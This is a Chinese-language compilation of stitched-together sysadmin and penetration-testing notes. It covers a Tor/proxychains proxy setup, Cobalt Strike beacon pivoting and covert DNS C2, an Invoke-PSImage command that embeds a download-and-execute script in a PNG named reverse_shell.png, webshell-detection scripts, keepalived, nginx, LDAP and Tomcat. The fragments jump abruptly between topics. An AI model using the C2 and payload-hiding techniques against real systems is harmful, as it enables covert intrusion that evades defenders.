Tor 核心    本文的重点,全平台支持,至于tor的各种图形控制端,这里可能暂时也用不上,先不多说了 
Tor Browser   tor浏览器,全平台支持,使用极为简单,挂上vpn以后,不用任何配置,直接’connect’即可,当然,如果在国内也可以不用通过网桥来上 Orbot    
tor 安卓版,有兴趣,可自行尝试,还是那句话,务必要先挂上vpn或直接连网桥,否则在国内是连不上tor的 https://www.torproject.org tor项目官方站点

# vi /etc/apt/sources.list   将以下源直接追加到该文件末尾 
deb http://deb.torproject.org/torproject.org trusty main 
deb-src http://deb.torproject.org/torproject.org trusty main

# gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 
# gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add –  #

apt update 
 # apt install tor deb.torproject.org-keyring -y  
 # /etc/init.d/tor start    尝试启动tor服务,默认它会运行在一个名为debian-tor的系统伪用户权限下 
 # netstat -tulnp | grep 9050  服务成功启动后,默认会起一个9050的tcp端口的,其实,说白点,就是个socks端口

# egrep -v "^#|^$" /etc/tor/torrc 此处可以看到,安装完tor以后,默认是没有任何自定义配置的,都是在按默认的选项参数走 
# vi /etc/tor/torrc      编辑tor的主配置文件,修改以下配置 
AvoidDiskWrites 1     # 减少对硬盘的读写 
SOCKSPort 198.13.52.95:8080   # tor默认使用的socks5代理端口是9050,建议改掉,被人扫到以后,容易被滥用,监听地址,改为vps的公网地址即可,默认它只监听在127.0.0.1上

SOCKSPolicy accept 23.7.17.0/24  
SOCKSPolicy reject *

Log notice file Log notice file /var/log/tor/tor.log

ExcludeNodes {cn},{hk},{mo},{sg},{th},{pk},{by},{ru},{ir},{vn},{ph},{my},{cu} 
ExcludeExitNodes {cn},{hk},{mo},{sg},{th},{pk},{by},{ru},{ir},{vn},{ph},{my},{cu} 
StrictNodes 1

#/etc/init.d/tor restart    配置搞定之后重启tor服务,让配置生效 
# netstat -tulnp | grep 8080   起来以后顺手看下我们刚才改的socks5代理端口有没有起来 
# tail -f /var/log/tor/tor.log  从该日志中我们可以清晰看到tor的启动过程,方便后续排错用

apt-get install proxychains4 -y 

``` 
而后开始简单配置proxychains-ng,{注意,proxychains-ng的默认配置文件是proxychains4.conf不是proxychains.conf,用的时候可以直接用-f选项加载配置文件来执行}

[egrep -v "^$|^#" /etc/proxychains4.conf ]
[vi /etc/proxychains4.conf ]

简单理解,所谓的`派生`,即仅仅通过一个beacon shell就可以再孵化出n个shell,shell与shell之间相当于以一种级联的形式存在的
而团队服务器则位于这些节点的根节点位置,连接这些节点的则是`beacon隧道`自己,此功能可有效提高一个渗透团队成员间的协同作战能力,快速共享渗透资源
当然,这也势必会在后期形成一个非常复杂的`渗透网络`,不过这也正好方便大家同时多点切入,说白点儿,其实就类似于一个大型的分布式入侵系统
而这一切的根本保证就是我们在公网中的各个团队服务器节点,只要团队服务器节点不挂,权限就不太容易丢,除非活不干净,被人主动发现了
因为其内部涉及到的细节还非常深,也绝不是一两句话就能说清楚的,但作为使用者,我们只需理解其大致的工作流程即可
如果你自己真的有非常强的 RAT & 逆向 & 协议分析 能力,可以再继续深入研究,始终认为,cobalt strike 确实是一个非常值得深入学习的优秀样本
如果能真正把它搞通透了,基础协议这一块对你来讲,基本就不再有盲区,废话不多说,我们还是在实战中多多体会吧...

-> beacon shell会向指定的域名发起正常的dns查询
  -> 中间依然是经过一些列的常规dns迭代及递归查询,大致过程就是,一直从根开始找,直到找到我们自己的ns服务器,最后再定位到团队服务器ip,仅此而已
    -> 也就是说,第一次通信可能会慢点,后续就会稍微快些,不过说实话,dns再快也快不到哪里去,毕竟,我们要的是足够的隐蔽,而不一味追求速度,不然容易露点

https://github.com/klionsec/Invoke-PSImage
C:\>powershell -exec bypass
PS C:\> Import-Module .\Invoke-PSImage.ps1
PS C:\> Invoke-PSImage -Script .\Download-Execute-PS.ps1 -Image .\large.JPG -Out .\reverse_shell.png -Web

#!/bin/bash
# author by klion
# 2017.12.25
# Delete webshell auto 

webshell_log="/var/log/webshell.log"
upload_shell="/var/log/modify.tmp"

# 只要一检测到有新事件发生就立马打包上传检测
[ -s $webshell_log ] &&{
    awk -F " " '{print $3}' $webshell_log |grep -E ".php$"| sort -u > $upload_shell
    cat $upload_shell |xargs zip ./maybeshell.zip
    echo `curl https://scanner.baidu.com/enqueue -F archive=@maybeshell.zip` | mail -s "webshell detect url api" klion@protonmail.com 
    sleep 5
    > $webshell_log && > $upload_shell && rm -fr ./maybeshell.zip
}

#!/bin/bash
# author by klion
# 2017.12.25
# Real-time monitoring of Web Directory script

web_dir="/usr/local/nginx/html/bwapp/bWAPP/"
oldnum=`wc -l web_history_db.log | awk -F " " '{print $1}'`
newnum=`find $web_dir -type f | wc -l`
md5num=`md5sum -c web_history_db.log | grep -i FAILED | wc -l`

# 先对指定的站点目录创建指纹库
[ ! -f web_history_db.log  ] && {
    find $web_dir -type f | xargs md5sum > ./web_history_db.log
}

# 和新文件对比指纹,如果发现不对,就马上发信通知,并带上被改动的文件路径一起
[ $md5num -ne 0 ] && {
    md5sum -c web_history_db.log | grep -i "FAILED" | awk -F ":" '{print $1}' > web_mod_`date +%Y-%m-%d-%H-%M-%S`.web.log
    log_file=`ls -l *.web.log | head -n 1 | awk -F " " '{print $9}'`
    mail -s "Your website may be hacked, Please check it as soon as possible" klion@protonmail.com < $log_file;sleep 5
    rm -fr $log_file
}

# 对比文件个数,发现不对,同样是立马发信,因为有可能要同时监控很多个站点目录,所以就顺便把具体的站点路径也带上了
[ $oldnum -ne $newnum  ] && {
    echo "website directory is $web_dir" | mail -s "web directory have new file created " klion@protonmail.com ;sleep 5
}

早期是专为 `LVS` 设计的,主要用来监控LVS集群中各个节点状态
内部基于 `VRRP协议` 实现,即`虚拟路由冗余协议`,从名字不难看出,协议本身是用于保证实现路由节点高可用的

简单来讲,即将N台提供相同功能的路由器组成一个路由器组,在这个组里有一个master和多个backup
一般情况下,master是由选举算法产生的,另外需要注意的是,只有在 master 上才有一个用于对外提供服务的虚拟ip
其它的backup都是没有的,当master在对外提供服务时,其它的backup又在干什么呢
很简单,当master在对外提供服务时,它同时也在不停的向所有的backup发送VRRP状态信息 `说白点儿就是心跳包`
告诉所有backup们,说,'我还没累死,你们先歇着,等我挂了,你们再上',然后,所有的backup就会一直在那儿闲着不停地接收这样的状态信息
当某一时刻,backup突然没再接到这样的状态回应时,就说明master已经光荣牺牲了
所有的backup会再重新用选举算法,把优先级最高的backup升级为master继续对外提供服务,以此保证了服务的持续可用性,即所谓的高可用

首先,在所有需要进行高可用的web节点机器上部署好keepalived,并在节点中设置一个master,其它的则全部设为backup
一旦backup接收不到来自master的心跳数据,即认为master已挂掉,backup随即就会接管master的所有资源数据
当master状态恢复时,backup会把所有的资源数据再移交给master处理,此,即为最简单的web高可用实现

主要用于一些较大型的站点架构,这样做一定程度上可以有效减轻后端节点压力,也就是说,有时候你在前端url中看到的一个目录,其后端对应的很可能就是一个集群
另外,这样会使网站更加静态化,利于缓存,可显著提高网站访问速度,有效实现前后端解耦,但这样无疑会加大开发的繁琐程度,前后端只能通过各种接口进行通信

NginxHttp	ip: 192.168.3.49	对应域名: reverse.org		nginx反向代理服务器
OldLamp		ip: 192.168.3.45	对应域名: www.bwapp.cc		假设为动态服务器
OldLnmp		ip: 192.168.3.42	对应域名: test.bwapp.org 	假设为静态服务器

# vi /etc/hosts
  192.168.3.42	test.bwapp.org bwapp.org
  192.168.3.45	bwapp.cc www.bwapp.cc
  192.168.3.75  lvs.org
  192.168.3.49	reverse.org

`ldap` 基于tcp/ip的轻量级目录访问协议,属于X.500目录协议族的一个简化版本
你可以暂时把它粗暴的理解成 `一种特殊类型的数据库` ,通常,这种数据库文件后缀都为`.ldif`,并使用特殊的节点查询语句来获取相应数据
实际生产环境中,主要还是用它来做各种查询比较多,既是查询,也就意味着肯定会有大量的读操作
虽然,ldap也支持一些简单的更新功能,即写,但一般都不会用,因为它在写方面的效率并不高
如果真的是写比较多,直接用各种关系型数据库代替就好了,实在没必要用ldap,毕竟,术业有专攻
另外,ldap 跨平台,功能简洁,易管理,配置,读性能也不错,亦可分布式部署`不知道是不是可以把它的分布式理解成windows域的目录树,目录林概念`
用的最多的可能就是进行`集中身份验证`,最后,我们还需要知道的是,默认情况下,ldap的所有数据都是直接以明文传输的,容易被截获,不过好在它支持ssl

X.500 		过于庞大臃肿
ldap  		轻量且配置简单
windows活动目录  有平台限制
NIS		个人暂时还没接触过

和常规关系型数据库不同的是,ldap并非按照常规的库,表,字段方式来存储数据
而是按照一种特殊的倒树状结构层级来组织管理数据,此处的树指的就是目录信息树,即`DIT`
所谓的目录信息树其实相当于专门用来进行读操作的数据库
在DIT内部则由N个条目`entry`所组成,就相当于我们常规数据库表中每条具体的记录
而条目的内容则是由具有唯一标识名`DN`的属性[Attribute]及属性对应的值[value]所组成的这么一个集合
条目为ldap中最基础的操作单位,通常对ldap的增删改查都是以条目为基本单元进行的

https://zh.wikipedia.org/wiki/Apache_Tomcat

CentOS7 x86_64 	ip: 192.168.3.64
Apache Tomcat/8.5.24 	建议大家使用较新版的稳定版本

# tar xf jdk-8u151-linux-x64.tar.gz
# mv jdk1.8.0_151/ /usr/local/
# ln -s /usr/local/jdk1.8.0_151/ /usr/local/jdk
# tar xf apache-tomcat-8.5.24.tar.gz
# mv apache-tomcat-8.5.24 /usr/local/
# ln -s /usr/local/apache-tomcat-8.5.24/ /usr/local/tomcat
# ll /usr/local/
# vi /etc/profile
  export JAVA_HOME=/usr/local/jdk/ 
  export PATH=$JAVA_HOME/bin:$JAVA_HOME/jre/bin:$PATH 
  export CLASSPATH=.$CLASSPATH:$JAVA_HOME/lib:$JAVA_HOME/jre/lib:$JAVA_HOME/lib/tools.jar
  export TOMCAT_HOME=/usr/local/tomcat
# source /etc/profile
# java -version
# javac